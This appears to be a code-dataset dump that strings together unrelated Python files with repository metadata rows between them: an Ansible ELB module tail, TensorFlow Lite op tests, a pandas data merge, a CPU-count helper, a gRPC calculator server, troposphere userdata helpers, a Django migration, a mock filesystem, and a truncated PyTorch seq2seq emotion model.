        purge_zones={'default': False, 'required': False, 'type': 'bool'},
        security_group_ids={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
        security_group_names={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
        health_check={'default': None, 'required': False, 'type': 'dict'},
        subnets={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
        purge_subnets={'default': False, 'required': False, 'type': 'bool'},
        scheme={'default': 'internet-facing', 'required': False, 'choices': ['internal', 'internet-facing']},
        connection_draining_timeout={'default': None, 'required': False, 'type': 'int'},
        idle_timeout={'default': None, 'type': 'int', 'required': False},
        cross_az_load_balancing={'default': None, 'type': 'bool', 'required': False},
        stickiness={'default': None, 'required': False, 'type': 'dict'},
        access_logs={'default': None, 'required': False, 'type': 'dict'},
        wait={'default': False, 'type': 'bool', 'required': False},
        wait_timeout={'default': 60, 'type': 'int', 'required': False},
        tags={'default': None, 'required': False, 'type': 'dict'}
    )

    module = AnsibleAWSModule(
        argument_spec=argument_spec,
        check_boto3=False,
        mutually_exclusive=[['security_group_ids', 'security_group_names']]
    )

    # This legacy module still relies on boto2.
    if not HAS_BOTO:
        module.fail_json(msg='boto required for this module')

    region, ec2_url, aws_connect_params = get_aws_connection_info(module)
    if not region:
        module.fail_json(msg="Region must be specified as a parameter, in EC2_REGION or AWS_REGION environment variables or in boto configuration file")

    # Unpack module parameters into locals for readability below.
    name = module.params['name']
    state = module.params['state']
    listeners = module.params['listeners']
    purge_listeners = module.params['purge_listeners']
    instance_ids = module.params['instance_ids']
    purge_instance_ids = module.params['purge_instance_ids']
    zones = module.params['zones']
    purge_zones = module.params['purge_zones']
    security_group_ids = module.params['security_group_ids']
    security_group_names = module.params['security_group_names']
    health_check = module.params['health_check']
    access_logs = module.params['access_logs']
    subnets = module.params['subnets']
    purge_subnets = module.params['purge_subnets']
    scheme = module.params['scheme']
    connection_draining_timeout = module.params['connection_draining_timeout']
    idle_timeout = module.params['idle_timeout']
    cross_az_load_balancing = module.params['cross_az_load_balancing']
    stickiness = module.params['stickiness']
    wait = module.params['wait']
    wait_timeout = module.params['wait_timeout']
    tags = module.params['tags']

    # Up-front validation of parameter combinations.
    if state == 'present' and not listeners:
        module.fail_json(msg="At least one listener is required for ELB creation")

    if state == 'present' and not (zones or subnets):
        module.fail_json(msg="At least one availability zone or subnet is required for ELB creation")

    if wait_timeout > 600:
        module.fail_json(msg='wait_timeout maximum is 600 seconds')

    # Resolve security group names to ids (scoped to the subnets' VPC when
    # subnets were supplied).
    if security_group_names:
        security_group_ids = []
        try:
            ec2 = connect_to_aws(boto.ec2, region, **aws_connect_params)
            if subnets:
                vpc_conn = _get_vpc_connection(module=module, region=region, aws_connect_params=aws_connect_params)
                vpc_id = vpc_conn.get_all_subnets([subnets[0]])[0].vpc_id
                filters = {'vpc_id': vpc_id}
            else:
                filters = None
            grp_details = ec2.get_all_security_groups(filters=filters)

            for group_name in security_group_names:
                if isinstance(group_name, string_types):
                    group_name = [group_name]

                group_id = [str(grp.id) for grp in grp_details if str(grp.name) in group_name]
                security_group_ids.extend(group_id)
        except boto.exception.NoAuthHandlerFound as e:
            module.fail_json_aws(e)

    elb_man = ElbManager(module, name, listeners, purge_listeners, zones,
                         purge_zones, security_group_ids, health_check,
                         subnets, purge_subnets, scheme,
                         connection_draining_timeout, idle_timeout,
                         cross_az_load_balancing,
                         access_logs, stickiness, wait, wait_timeout, tags,
                         region=region, instance_ids=instance_ids, purge_instance_ids=purge_instance_ids,
                         **aws_connect_params)

    # Feature gates: some ELB attributes require newer boto releases.
    if cross_az_load_balancing and not elb_man._check_attribute_support('cross_zone_load_balancing'):
        module.fail_json(msg="You must install boto >= 2.18.0 to use the cross_az_load_balancing attribute")

    if connection_draining_timeout and not elb_man._check_attribute_support('connection_draining'):
        module.fail_json(msg="You must install boto >= 2.28.0 to use the connection_draining_timeout attribute")

    if idle_timeout and not elb_man._check_attribute_support('connecting_settings'):
        module.fail_json(msg="You must install boto >= 2.33.0 to use the idle_timeout attribute")

    if state == 'present':
        elb_man.ensure_ok()
    elif state == 'absent':
        elb_man.ensure_gone()

    ansible_facts = {'ec2_elb': 'info'}
    ec2_facts_result = dict(changed=elb_man.changed,
                            elb=elb_man.get_info(),
                            ansible_facts=ansible_facts)

    module.exit_json(**ec2_facts_result)
# Standard Ansible module entry point.
if __name__ == '__main__':
    main()
| true | true |
1c3c8d3daec588738c0d7cd5687b65688f07c05a | 3,306 | py | Python | tensorflow/lite/testing/op_tests/sparse_to_dense.py | EricRemmerswaal/tensorflow | 141ff27877579c81a213fa113bd1b474c1749aca | [
"Apache-2.0"
] | 190,993 | 2015-11-09T13:17:30.000Z | 2022-03-31T23:05:27.000Z | tensorflow/lite/testing/op_tests/sparse_to_dense.py | EricRemmerswaal/tensorflow | 141ff27877579c81a213fa113bd1b474c1749aca | [
"Apache-2.0"
] | 48,461 | 2015-11-09T14:21:11.000Z | 2022-03-31T23:17:33.000Z | tensorflow/lite/testing/op_tests/sparse_to_dense.py | EricRemmerswaal/tensorflow | 141ff27877579c81a213fa113bd1b474c1749aca | [
"Apache-2.0"
] | 104,981 | 2015-11-09T13:40:17.000Z | 2022-03-31T19:51:54.000Z | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test configs for sparse_to_dense."""
import numpy as np
import tensorflow.compat.v1 as tf
from tensorflow.lite.testing.zip_test_utils import create_scalar_data
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
@register_make_test_function()
def make_sparse_to_dense_tests(options):
  """Make a set of tests to do sparse to dense."""

  test_parameters = [{
      "value_dtype": [tf.float32, tf.int32, tf.int64],
      "index_dtype": [tf.int32, tf.int64],
      "value_count": [1, 3, 6, 8],
      "dense_shape": [[15], [3, 10], [4, 4, 4, 4], [7, 10, 9]],
      "default_value": [0, -1],
      "value_is_scalar": [True, False],
  }]

  # Return a single value for 1-D dense shape, but a tuple for other shapes.
  def generate_index(dense_shape):
    if len(dense_shape) == 1:
      return np.random.randint(dense_shape[0])
    else:
      index = []
      for shape in dense_shape:
        index.append(np.random.randint(shape))
      return tuple(index)

  def build_graph(parameters):
    """Build the sparse_to_dense op testing graph."""
    dense_shape = parameters["dense_shape"]

    # Special handle for value_is_scalar case.
    # value_count must be 1.
    if parameters["value_is_scalar"] and parameters["value_count"] == 1:
      value = tf.compat.v1.placeholder(
          name="value", dtype=parameters["value_dtype"], shape=())
    else:
      value = tf.compat.v1.placeholder(
          name="value",
          dtype=parameters["value_dtype"],
          shape=[parameters["value_count"]])

    # Draw random coordinates until value_count distinct ones exist; a set
    # guarantees no duplicate indices reach sparse_to_dense.
    indices = set()
    while len(indices) < parameters["value_count"]:
      indices.add(generate_index(dense_shape))
    indices = tf.constant(tuple(indices), dtype=parameters["index_dtype"])

    # TODO(renjieliu): Add test for validate_indices case.
    out = tf.sparse_to_dense(
        indices,
        dense_shape,
        value,
        parameters["default_value"],
        validate_indices=False)
    return [value], [out]

  def build_inputs(parameters, sess, inputs, outputs):
    """Feed random data of the parameterized dtype/shape and run the graph."""
    if parameters["value_is_scalar"] and parameters["value_count"] == 1:
      input_value = create_scalar_data(parameters["value_dtype"])
    else:
      input_value = create_tensor_data(parameters["value_dtype"],
                                       [parameters["value_count"]])
    return [input_value], sess.run(
        outputs, feed_dict=dict(zip(inputs, [input_value])))

  make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
| 38.894118 | 80 | 0.676346 |
import numpy as np
import tensorflow.compat.v1 as tf
from tensorflow.lite.testing.zip_test_utils import create_scalar_data
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
@register_make_test_function()
def make_sparse_to_dense_tests(options):
  """Make a set of tests to do sparse to dense."""

  test_parameters = [{
      "value_dtype": [tf.float32, tf.int32, tf.int64],
      "index_dtype": [tf.int32, tf.int64],
      "value_count": [1, 3, 6, 8],
      "dense_shape": [[15], [3, 10], [4, 4, 4, 4], [7, 10, 9]],
      "default_value": [0, -1],
      "value_is_scalar": [True, False],
  }]

  # Return a single value for a 1-D dense shape, but a coordinate tuple
  # for higher-rank shapes.
  def generate_index(dense_shape):
    if len(dense_shape) == 1:
      return np.random.randint(dense_shape[0])
    else:
      index = []
      for shape in dense_shape:
        index.append(np.random.randint(shape))
      return tuple(index)

  def build_graph(parameters):
    """Build the sparse_to_dense op testing graph."""
    dense_shape = parameters["dense_shape"]
    # A scalar value placeholder is only valid when value_count is 1.
    if parameters["value_is_scalar"] and parameters["value_count"] == 1:
      value = tf.compat.v1.placeholder(
          name="value", dtype=parameters["value_dtype"], shape=())
    else:
      value = tf.compat.v1.placeholder(
          name="value",
          dtype=parameters["value_dtype"],
          shape=[parameters["value_count"]])
    # Draw random coordinates until value_count distinct ones exist; the
    # set guarantees no duplicate indices reach sparse_to_dense.
    indices = set()
    while len(indices) < parameters["value_count"]:
      indices.add(generate_index(dense_shape))
    indices = tf.constant(tuple(indices), dtype=parameters["index_dtype"])
    out = tf.sparse_to_dense(
        indices,
        dense_shape,
        value,
        parameters["default_value"],
        validate_indices=False)
    return [value], [out]

  def build_inputs(parameters, sess, inputs, outputs):
    """Feed random data of the parameterized dtype/shape and run the graph."""
    if parameters["value_is_scalar"] and parameters["value_count"] == 1:
      input_value = create_scalar_data(parameters["value_dtype"])
    else:
      input_value = create_tensor_data(parameters["value_dtype"],
                                       [parameters["value_count"]])
    return [input_value], sess.run(
        outputs, feed_dict=dict(zip(inputs, [input_value])))

  make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
| true | true |
1c3c8d952ab700f4ba2649d2330ad77bae914afb | 280 | py | Python | python-programming/unit34.py | s05252/course-2018-2 | 4695bf1556603fc2549464512afc96765f45132e | [
"Apache-2.0"
] | 1 | 2018-12-13T02:43:25.000Z | 2018-12-13T02:43:25.000Z | python-programming/unit34.py | s05252/course-2018-2 | 4695bf1556603fc2549464512afc96765f45132e | [
"Apache-2.0"
] | null | null | null | python-programming/unit34.py | s05252/course-2018-2 | 4695bf1556603fc2549464512afc96765f45132e | [
"Apache-2.0"
] | null | null | null | import pandas as pd
import numpy as np
# Load the 2009 NIAAA per-state alcohol consumption report, indexed by state.
alco2009 = pd.read_csv("niaaa-report2009.csv", index_col="State")
# Bare expression: displays the frame in a notebook/REPL; no effect as a script.
alco2009
# Load per-state population figures, sharing the same "State" index.
population = pd.read_csv("population.csv", index_col="State")
population.head()
# Join the two frames on their shared "State" index.
df = pd.merge(alco2009, population, left_index=True,
              right_index=True)
df.head()
| 18.666667 | 65 | 0.757143 | import pandas as pd
import numpy as np
# Load the 2009 NIAAA per-state alcohol consumption report, indexed by state.
alco2009 = pd.read_csv("niaaa-report2009.csv", index_col="State")
# Bare expression: displays the frame in a notebook/REPL; no effect as a script.
alco2009
# Load per-state population figures, sharing the same "State" index.
population = pd.read_csv("population.csv", index_col="State")
population.head()
# Join the two frames on their shared "State" index.
df = pd.merge(alco2009, population, left_index=True,
              right_index=True)
df.head()
| true | true |
1c3c8fa84a75a5fa6d2a28f5ef2b070cfbacecf2 | 551 | py | Python | redundant100/ncpus.py | luispedro/Coelho2021_GMGCv1_analysis | 5f1a62844631121cc11f8ac5a776d25baca56ff7 | [
"MIT"
] | 6 | 2021-12-16T09:20:28.000Z | 2022-03-29T03:21:48.000Z | redundant100/ncpus.py | luispedro/Coelho2021_GMGCv1_analysis | 5f1a62844631121cc11f8ac5a776d25baca56ff7 | [
"MIT"
] | 1 | 2022-02-18T01:56:56.000Z | 2022-02-22T14:39:48.000Z | redundant100/ncpus.py | luispedro/Coelho2021_GMGCv1_analysis | 5f1a62844631121cc11f8ac5a776d25baca56ff7 | [
"MIT"
def get_ncpus():
    """Return the CPU count advertised by the environment.

    Precedence: OMP_NUM_THREADS, Q_CORES, Q_CORE, then the LSF variable
    LSB_MCPU_HOSTS ("<host> <n>"); defaults to 1 when none are set.
    Raises SystemError when LSB_MCPU_HOSTS lists more than one host.
    """
    from os import environ
    for var in ('OMP_NUM_THREADS', 'Q_CORES', 'Q_CORE'):
        if var in environ:
            return int(environ[var].strip())
    if 'LSB_MCPU_HOSTS' not in environ:
        return 1
    tokens = environ['LSB_MCPU_HOSTS'].strip().split()
    if len(tokens) > 2:
        raise SystemError("Cannot handle this type of environment ({}='{}')".format('LSB_MCPU_HOSTS', environ['LSB_MCPU_HOSTS']))
    return int(tokens[1])
# Quick manual check from the command line.
if __name__ == '__main__':
    print('Running with {} CPUS.'.format(get_ncpus()))
def get_ncpus():
    """Return the number of CPUs granted by the job environment.

    Checks OMP_NUM_THREADS / Q_CORES / Q_CORE first, then the LSF host
    list LSB_MCPU_HOSTS ("<host> <n>"); falls back to 1 when none of
    these are set.  Raises SystemError for multi-host LSF allocations.
    """
    from os import environ
    simple_values = [environ[v] for v in ('OMP_NUM_THREADS', 'Q_CORES', 'Q_CORE')
                     if v in environ]
    if simple_values:
        return int(simple_values[0].strip())
    lsf_value = environ.get('LSB_MCPU_HOSTS')
    if lsf_value is None:
        return 1
    tokens = lsf_value.strip().split()
    if len(tokens) > 2:
        raise SystemError("Cannot handle this type of environment ({}='{}')".format('LSB_MCPU_HOSTS', lsf_value))
    return int(tokens[1])
# Quick manual check from the command line.
if __name__ == '__main__':
    print('Running with {} CPUS.'.format(get_ncpus()))
| true | true |
1c3c902c27fd52765d86d6f2fa245ea707da6cba | 1,239 | py | Python | code/server.py | cyberbeast/gRPC-learn | d46f7a8ab917df1d2469945a94f421e7406dd211 | [
"MIT"
] | null | null | null | code/server.py | cyberbeast/gRPC-learn | d46f7a8ab917df1d2469945a94f421e7406dd211 | [
"MIT"
] | null | null | null | code/server.py | cyberbeast/gRPC-learn | d46f7a8ab917df1d2469945a94f421e7406dd211 | [
"MIT"
] | null | null | null | import grpc
from concurrent import futures
import time
# import the generated classes
import calculator_pb2
import calculator_pb2_grpc
# import the original calculator.py
import calculator
# create a class to define the server functions, derived from calculator_pb2_grpc.CalculatorServicer
class CalculatorServicer(calculator_pb2_grpc.CalculatorServicer):
    """gRPC servicer exposing the local calculator module's operations."""

    # calculator.square_root is exposed here
    # the request and response are of the data type
    # calculator_pb2.Number
    def SquareRoot(self, request, context):
        # Delegate the math to the plain-Python implementation and wrap
        # the result in the generated protobuf message type.
        response = calculator_pb2.Number()
        response.value = calculator.square_root(request.value)
        return response
# create a gRPC server
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
# use the generated function `add_CalculatorServicer_to_server`
# to add the defined class to the server
calculator_pb2_grpc.add_CalculatorServicer_to_server(CalculatorServicer(), server)
# Listen on port 50051 (insecure: no TLS)
print("Starting server. Listening on port 50051.")
server.add_insecure_port('[::]:50051')
server.start()
# since server.start() will not block, a sleep loop is added to keep alive
try:
    while True:
        time.sleep(86400)
except KeyboardInterrupt:
    # Ctrl-C: shut the server down immediately (grace period of 0).
    server.stop(0)
| 29.5 | 100 | 0.775626 | import grpc
from concurrent import futures
import time
import calculator_pb2
import calculator_pb2_grpc
import calculator
class CalculatorServicer(calculator_pb2_grpc.CalculatorServicer):
    """gRPC servicer exposing the local calculator module's operations."""

    def SquareRoot(self, request, context):
        # Delegate the math to the plain-Python implementation and wrap
        # the result in the generated protobuf Number message.
        response = calculator_pb2.Number()
        response.value = calculator.square_root(request.value)
        return response
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
calculator_pb2_grpc.add_CalculatorServicer_to_server(CalculatorServicer(), server)
print("Starting server. Listening on port 50051.")
server.add_insecure_port('[::]:50051')
server.start()
try:
while True:
time.sleep(86400)
except KeyboardInterrupt:
server.stop(0)
| true | true |
1c3c9034397d6200c1350af9bdba91cc9ca01849 | 1,382 | py | Python | troposphere/helpers/userdata.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | 4,573 | 2015-01-02T20:31:04.000Z | 2022-03-31T17:15:32.000Z | troposphere/helpers/userdata.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | 1,730 | 2015-01-02T19:24:47.000Z | 2022-03-31T23:22:52.000Z | troposphere/helpers/userdata.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | 1,753 | 2015-01-01T01:24:12.000Z | 2022-03-27T05:36:17.000Z | #!/usr/bin/python
from troposphere import Base64, Join, Sub
def from_file(filepath, delimiter="", blanklines=False):
"""Imports userdata from a file.
:type filepath: string
:param filepath The absolute path to the file.
:type delimiter: string
:param: delimiter Delimiter to use with the troposphere.Join().
:type blanklines: boolean
:param blanklines If blank lines should be ignored
rtype: troposphere.Base64
:return The base64 representation of the file.
"""
data = []
try:
with open(filepath, "r") as f:
for line in f:
if blanklines and line.strip("\n\r ") == "":
continue
data.append(line)
except IOError:
raise IOError("Error opening or reading file: {}".format(filepath))
return Base64(Join(delimiter, data))
def from_file_sub(filepath):
"""Imports userdata from a file, using Sub for replacing inline variables such as ${AWS::Region}
:type filepath: string
:param filepath The absolute path to the file.
rtype: troposphere.Base64
:return The base64 representation of the file.
"""
try:
with open(filepath, "rt") as f:
data = f.read()
return Base64(Sub(data))
except IOError:
raise IOError("Error opening or reading file: {}".format(filepath))
| 24.678571 | 100 | 0.628075 |
from troposphere import Base64, Join, Sub
def from_file(filepath, delimiter="", blanklines=False):
data = []
try:
with open(filepath, "r") as f:
for line in f:
if blanklines and line.strip("\n\r ") == "":
continue
data.append(line)
except IOError:
raise IOError("Error opening or reading file: {}".format(filepath))
return Base64(Join(delimiter, data))
def from_file_sub(filepath):
try:
with open(filepath, "rt") as f:
data = f.read()
return Base64(Sub(data))
except IOError:
raise IOError("Error opening or reading file: {}".format(filepath))
| true | true |
1c3c90bd1e2e00a79b73dd931d49e343660c67de | 482 | py | Python | corehq/apps/export/migrations/0004_datafile_delete_after.py | kkrampa/commcare-hq | d64d7cad98b240325ad669ccc7effb07721b4d44 | [
"BSD-3-Clause"
] | 1 | 2020-05-05T13:10:01.000Z | 2020-05-05T13:10:01.000Z | corehq/apps/export/migrations/0004_datafile_delete_after.py | kkrampa/commcare-hq | d64d7cad98b240325ad669ccc7effb07721b4d44 | [
"BSD-3-Clause"
] | 1 | 2019-12-09T14:00:14.000Z | 2019-12-09T14:00:14.000Z | corehq/apps/export/migrations/0004_datafile_delete_after.py | MaciejChoromanski/commcare-hq | fd7f65362d56d73b75a2c20d2afeabbc70876867 | [
"BSD-3-Clause"
] | 5 | 2015-11-30T13:12:45.000Z | 2019-07-01T19:27:07.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2018-08-15 19:57
from __future__ import absolute_import, unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('export', '0003_emailexportwhendonerequest'),
]
operations = [
migrations.AddField(
model_name='datafile',
name='delete_after',
field=models.DateTimeField(null=True),
),
]
| 22.952381 | 56 | 0.636929 |
from __future__ import absolute_import, unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('export', '0003_emailexportwhendonerequest'),
]
operations = [
migrations.AddField(
model_name='datafile',
name='delete_after',
field=models.DateTimeField(null=True),
),
]
| true | true |
1c3c90cd1655328d4f508a455455fe9f552e4551 | 2,765 | py | Python | mockutils/fs.py | jhedev/mockutils | 643928ab135be233e1c16f8501d550b966e71089 | [
"MIT"
] | null | null | null | mockutils/fs.py | jhedev/mockutils | 643928ab135be233e1c16f8501d550b966e71089 | [
"MIT"
] | 1 | 2015-01-22T16:43:58.000Z | 2015-01-22T16:43:58.000Z | mockutils/fs.py | jhedev/mockutils | 643928ab135be233e1c16f8501d550b966e71089 | [
"MIT"
] | null | null | null | import os
class VirtualFile(object):
def __init__(self, name, content=None):
self.name = name
self.content = content
def __str__(self):
return self.name
class VirtualDir(object):
def __init__(self, name, content={}):
self.name = name
self.content = content
def __str__(self):
res = "{}/\n".format(self.name)
for c in self.content:
res += '\t{}'.format(str(c))
return res
class VirtualFS(object):
def __init__(self, content={}):
self.root = VirtualDir('/', content=content)
self.cwd = self.root.name
def __str__(self):
return str(self.root)
@staticmethod
def isdir_obj(obj):
if type(obj) is VirtualDir:
return True
else:
return False
@staticmethod
def isfile_obj(obj):
if type(obj) is VirtualDir:
return True
else:
return False
def absolute_path(self, path):
if path.startswith('/'):
return os.path.normpath(path)
else:
return os.path.normpath(os.path.join(self.cwd, path))
def resolve_path(self, path):
path_components = list(filter(bool,
self.absolute_path(path).split('/')))
current_file = self.root
for p in path_components:
if p in current_file.content:
current_file = current_file.content[p]
else:
raise FileNotFoundError
return current_file
def get_content(self, path):
fs_object = self.resolve_path(path)
if fs_object.content is not None:
return list(fs_object.content.keys())
def exists(self, path):
try:
f = self.resolve_path(path)
except FileNotFoundError:
return False
return True
def chdir(self, path):
if self.exists(path):
self.cwd = self.absolute_path(path)
else:
raise FileNotFoundError
def isdir(self, path):
resolved = self.resolve_path(path)
return VirtualFS.isdir_obj(resolved)
class MockOS(object):
def __init__(self, filesystem):
self.fs = filesystem
self.path = _MockOSPath(filesystem)
def listdir(self, path='.'):
return self.fs.get_content(path)
def getcwd(self):
return self.fs.cwd
def chdir(self, path):
self.fs.chdir(path)
class _MockOSPath(object):
def __init__(self, filesystem):
self.fs = filesystem
def isdir(self, path):
return self.fs.isdir(path)
def exists(self, path):
return self.fs.exists(path)
def abspath(self, path):
return self.fs.absolute_path(path)
| 24.469027 | 75 | 0.577939 | import os
class VirtualFile(object):
def __init__(self, name, content=None):
self.name = name
self.content = content
def __str__(self):
return self.name
class VirtualDir(object):
def __init__(self, name, content={}):
self.name = name
self.content = content
def __str__(self):
res = "{}/\n".format(self.name)
for c in self.content:
res += '\t{}'.format(str(c))
return res
class VirtualFS(object):
def __init__(self, content={}):
self.root = VirtualDir('/', content=content)
self.cwd = self.root.name
def __str__(self):
return str(self.root)
@staticmethod
def isdir_obj(obj):
if type(obj) is VirtualDir:
return True
else:
return False
@staticmethod
def isfile_obj(obj):
if type(obj) is VirtualDir:
return True
else:
return False
def absolute_path(self, path):
if path.startswith('/'):
return os.path.normpath(path)
else:
return os.path.normpath(os.path.join(self.cwd, path))
def resolve_path(self, path):
path_components = list(filter(bool,
self.absolute_path(path).split('/')))
current_file = self.root
for p in path_components:
if p in current_file.content:
current_file = current_file.content[p]
else:
raise FileNotFoundError
return current_file
def get_content(self, path):
fs_object = self.resolve_path(path)
if fs_object.content is not None:
return list(fs_object.content.keys())
def exists(self, path):
try:
f = self.resolve_path(path)
except FileNotFoundError:
return False
return True
def chdir(self, path):
if self.exists(path):
self.cwd = self.absolute_path(path)
else:
raise FileNotFoundError
def isdir(self, path):
resolved = self.resolve_path(path)
return VirtualFS.isdir_obj(resolved)
class MockOS(object):
def __init__(self, filesystem):
self.fs = filesystem
self.path = _MockOSPath(filesystem)
def listdir(self, path='.'):
return self.fs.get_content(path)
def getcwd(self):
return self.fs.cwd
def chdir(self, path):
self.fs.chdir(path)
class _MockOSPath(object):
def __init__(self, filesystem):
self.fs = filesystem
def isdir(self, path):
return self.fs.isdir(path)
def exists(self, path):
return self.fs.exists(path)
def abspath(self, path):
return self.fs.absolute_path(path)
| true | true |
1c3c91793e2535732d729bf77f497a54a5caf490 | 8,665 | py | Python | model/dec_rep.py | chenyangh/DialogueGenerationWithEmotion | 88433fa3ad32da5eab7923aef11fe34105a3e1f9 | [
"MIT"
] | 61 | 2018-02-19T06:21:44.000Z | 2022-02-14T09:17:46.000Z | model/dec_rep.py | chenyangh/DialogueGenerationWithEmotion | 88433fa3ad32da5eab7923aef11fe34105a3e1f9 | [
"MIT"
] | 9 | 2019-03-20T13:23:00.000Z | 2022-01-26T15:19:51.000Z | model/dec_rep.py | chenyangh/DialogueGenerationWithEmotion | 88433fa3ad32da5eab7923aef11fe34105a3e1f9 | [
"MIT"
] | 20 | 2018-04-08T15:37:55.000Z | 2021-11-12T08:13:05.000Z | import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
USE_CUDA = True
NUM_EMO = 9
class SoftDotAttention(nn.Module):
"""Soft Dot Attention.
Ref: http://www.aclweb.org/anthology/D15-1166
Adapted from PyTorch OPEN NMT.
"""
def __init__(self, dim):
"""Initialize layer."""
super(SoftDotAttention, self).__init__()
self.linear_in = nn.Linear(dim, dim, bias=False)
self.sm = nn.Softmax()
self.linear_out = nn.Linear(dim * 2, dim, bias=False)
self.tanh = nn.Tanh()
self.mask = None
def forward(self, input, context):
"""Propogate input through the network.
input: batch x dim
context: batch x sourceL x dim
"""
target = self.linear_in(input).unsqueeze(2) # batch x dim x 1
# Get attention
attn = torch.bmm(context, target).squeeze(2) # batch x sourceL
attn = self.sm(attn)
attn3 = attn.view(attn.size(0), 1, attn.size(1)) # batch x 1 x sourceL
weighted_context = torch.bmm(attn3, context).squeeze(1) # batch x dim
h_tilde = torch.cat((weighted_context, input), 1)
h_tilde = self.tanh(self.linear_out(h_tilde))
return h_tilde, attn
class PersonaLSTMAttentionDot(nn.Module):
r"""A long short-term memory (LSTM) cell with attention."""
def __init__(self, input_size, hidden_size, batch_first=True):
"""Initialize params."""
super(PersonaLSTMAttentionDot, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.num_layers = 1
self.batch_first = batch_first
self.input_weights = nn.Linear(input_size, 4 * hidden_size)
self.hidden_weights = nn.Linear(hidden_size, 4 * hidden_size)
self.emotion_weights = nn.Embedding(NUM_EMO + 1, 4 * hidden_size)
self.attention_layer = SoftDotAttention(hidden_size)
def forward(self, input, tag, hidden, ctx, ctx_mask=None):
"""Propogate input through the network."""
# tag = None #
def recurrence(input, hidden):
"""Recurrence helper."""
hx, cx = hidden # n_b x hidden_dim
gates = self.input_weights(input) + \
self.hidden_weights(hx) + \
self.emotion_weights(tag)
ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1)
ingate = F.sigmoid(ingate)
forgetgate = F.sigmoid(forgetgate)
cellgate = F.tanh(cellgate) # o_t
outgate = F.sigmoid(outgate)
cy = (forgetgate * cx) + (ingate * cellgate)
hy = outgate * F.tanh(cy) # n_b x hidden_dim
h_tilde, alpha = self.attention_layer(hy, ctx.transpose(0, 1))
return h_tilde, cy
if self.batch_first:
input = input.transpose(0, 1)
output = []
steps = range(input.size(0))
for i in steps:
hidden = recurrence(input[i], hidden)
if isinstance(hidden, tuple):
output.append(hidden[0])
else:
output.append(hidden)
# output.append(hidden[0] if isinstance(hidden, tuple) else hidden)
# output.append(isinstance(hidden, tuple) and hidden[0] or hidden)
output = torch.cat(output, 0).view(input.size(0), *output[0].size())
if self.batch_first:
output = output.transpose(0, 1)
return output, hidden
class PersonaSeq2SeqAttentionSharedEmbedding(nn.Module):
"""Container module with an encoder, deocder, embeddings."""
def __init__(
self,
emb_dim,
vocab_size,
src_hidden_dim,
trg_hidden_dim,
ctx_hidden_dim,
attention_mode,
batch_size,
pad_token_src,
pad_token_trg,
bidirectional=True,
nlayers=2,
nlayers_trg=2,
dropout=0.,
):
"""Initialize model."""
super(PersonaSeq2SeqAttentionSharedEmbedding, self).__init__()
self.vocab_size = vocab_size
self.emb_dim = emb_dim
self.src_hidden_dim = src_hidden_dim
self.trg_hidden_dim = trg_hidden_dim
self.ctx_hidden_dim = ctx_hidden_dim
self.attention_mode = attention_mode
self.batch_size = batch_size
self.bidirectional = bidirectional
self.nlayers = nlayers
self.dropout = dropout
self.num_directions = 2 if bidirectional else 1
self.pad_token_src = pad_token_src
self.pad_token_trg = pad_token_trg
self.embedding = nn.Embedding(
vocab_size,
emb_dim,
self.pad_token_src
)
self.src_hidden_dim = src_hidden_dim // 2 \
if self.bidirectional else src_hidden_dim
self.encoder = nn.LSTM(
emb_dim,
self.src_hidden_dim,
nlayers,
bidirectional=bidirectional,
batch_first=True,
dropout=self.dropout
)
self.decoder = PersonaLSTMAttentionDot(
emb_dim,
trg_hidden_dim,
batch_first=True
)
self.encoder2decoder = nn.Linear(
self.src_hidden_dim * self.num_directions,
trg_hidden_dim
)
self.decoder2vocab = nn.Linear(trg_hidden_dim, vocab_size)
self.init_weights()
def init_weights(self):
"""Initialize weights."""
initrange = 0.1
self.embedding.weight.data.uniform_(-initrange, initrange)
self.encoder2decoder.bias.data.fill_(0)
self.decoder2vocab.bias.data.fill_(0)
def get_state(self, input):
"""Get cell states and hidden states."""
batch_size = input.size(0) \
if self.encoder.batch_first else input.size(1)
h0_encoder = Variable(torch.zeros(
self.encoder.num_layers * self.num_directions,
batch_size,
self.src_hidden_dim
), requires_grad=False)
c0_encoder = Variable(torch.zeros(
self.encoder.num_layers * self.num_directions,
batch_size,
self.src_hidden_dim
), requires_grad=False)
return h0_encoder.cuda(), c0_encoder.cuda()
def forward(self, input_src, input_trg, tag, trg_mask=None, ctx_mask=None):
"""Propogate input through the network."""
src_emb = self.embedding(input_src)
trg_emb = self.embedding(input_trg)
self.h0_encoder, self.c0_encoder = self.get_state(input_src)
src_h, (src_h_t, src_c_t) = self.encoder(
src_emb, (self.h0_encoder, self.c0_encoder)
)
if self.bidirectional:
h_t = torch.cat((src_h_t[-1], src_h_t[-2]), 1)
